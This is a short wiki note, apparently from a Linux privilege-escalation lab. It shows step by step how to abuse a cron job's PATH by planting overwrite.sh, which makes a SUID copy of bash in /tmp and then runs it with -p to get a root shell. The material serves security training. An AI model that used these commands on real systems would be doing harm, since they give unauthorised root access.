Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-05-19T06:22:43-04:00

====== path environment variables ======
Created Tuesday 19 May 2020

View the contents of the system-wide crontab:

**cat /etc/crontab**

Note that the PATH variable starts with /home/user which is our user's home directory.

Create a file called overwrite.sh in your home directory with the following contents:

**#!/bin/bash**

**cp /bin/bash /tmp/rootbash**
**chmod +xs /tmp/rootbash**

Make sure that the file is executable:

**chmod +x /home/user/overwrite.sh**



Wait for the cron job to run (should not take longer than a minute). Run the /tmp/rootbash command with -p to gain a shell running with root privileges:


watch for execution
**watch -n 1 ls -l /tmp**


**/tmp/rootbash -p**
